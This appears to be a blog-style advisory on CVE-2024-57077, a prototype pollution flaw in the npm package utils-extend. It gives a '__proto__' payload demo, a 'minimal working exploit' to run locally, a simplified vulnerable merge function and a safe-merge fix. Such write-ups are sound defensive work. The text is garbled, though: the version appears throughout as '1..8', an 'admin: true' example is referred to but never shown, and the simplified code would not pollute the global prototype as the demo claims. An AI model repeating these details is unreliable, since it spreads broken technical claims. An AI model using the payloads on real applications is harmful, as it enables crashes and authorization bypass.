CVE-2024-57077 - Prototype Pollution Vulnerability in utils-extend 1..8 – What You Need to Know

Recently, security researchers have discovered a new vulnerability that affects the popular npm package utils-extend, specifically version 1..8 – which, at the time of writing, is the latest available. This issue, tracked as CVE-2024-57077, lets attackers manipulate JavaScript object prototypes by abusing the package's primary function, lib.extend. In this article, I’ll explain what this means, how it works, give you code examples, and show how this can be exploited in real-world scenarios.

What Is Prototype Pollution?

*Prototype pollution* is a risk unique to JavaScript applications. If an attacker can change the properties of Object.prototype (the base object from which all JavaScript objects derive), they can inject their own properties or change existing ones for every object in the application. This can lead to weird bugs, application crashes (Denial of Service), or even security bypasses.

About the Vulnerability

The utils-extend package is commonly used in Node.js and web projects, often as a utility for deep object merging and extending. The vulnerable function is lib.extend, which does not adequately protect against properties like __proto__, constructor, or prototype.

What’s the Impact?

- DoS (Denial of Service): At a minimum, an attacker can crash your application by injecting problematic properties.
- Unexpected Behavior: Objects throughout your whole app can be altered, resulting in strange bugs and potential security risks, especially if your app logic is fooled by the polluted values.

Example: How the Vulnerability Works

Below is a simple demonstration of how an attacker can use the lib.extend function to pollute the global prototype:

// vulnerable app: using utils-extend 1..8
const extend = require('utils-extend');

// Attacker's payload
let payload = JSON.parse('{"__proto__": {"polluted": "pwned!"}}');

// Extending an empty object with the malicious payload
let result = extend({}, payload);

// Now, EVERY object in your app inherits 'polluted'
console.log({}.polluted); // Outputs: 'pwned!'

This works because the vulnerable function merges the user-supplied object UNCHECKED into the base object. If you don’t filter out keys like __proto__, this happens!

The Vulnerable Code

If we look at the source code for utils-extend 1..8, we can see the extend function looks like this (simplified):

function extend(target, source) {
  for (let key in source) {
    target[key] = source[key];
  }
  return target;
}

There are no checks to stop keys like __proto__ or constructor from being copied over.

How Can Attackers Exploit This?

Attackers who can control input passed to the lib.extend or similar functions can inject malicious payloads to pollute the prototype.

Now every object in your whole application unintentionally has admin: true.

You might then accidentally authorize the attacker or run code under wrong assumptions.

References

- NVD - CVE-2024-57077
- utils-extend on npm
- github.com/jonschlinkert/utils-extend (GitHub Repo)
- OWASP - Prototype Pollution

Here is a minimal working exploit you can test locally with utils-extend@1..8

// install with: npm install utils-extend@1..8
const extend = require('utils-extend');

console.log('Before:', {}.evil); // undefined

let evil = JSON.parse('{ "__proto__": { "evil": "it works!" } }');
extend({}, evil);

console.log('After:', {}.evil); // 'it works!'

Do not use utils-extend version 1..8 (or earlier) if you merge user-provided objects.

- Use libraries that protect against prototype pollution, or add your own checks to skip dangerous keys (__proto__, prototype, constructor).

Safe merging example

function safeExtend(target, source) {
  for (let key in source) {
    if (['__proto__', 'constructor', 'prototype'].includes(key)) continue;
    target[key] = source[key];
  }
  return target;
}

Final Thoughts

*CVE-2024-57077* shows how dangerous small utility vulnerabilities can be, especially in modern JavaScript environments where many objects are merged and extended. Always audit and keep your dependencies updated, and never trust user input without proper sanitization.

Stay safe and check your dependencies today!

*Written for exclusive use. If you found this post helpful, please share it with your team or on social media to help others stay secure.*

References

- https://nvd.nist.gov/vuln/detail/CVE-2024-57077
- https://github.com/jonschlinkert/utils-extend
- https://www.npmjs.com/package/utils-extend
- https://owasp.org/www-community/vulnerabilities/Prototype_Pollution

Timeline

Published on: 02/05/2025 22:15:31 UTC
Last modified on: 03/24/2025 16:15:20 UTC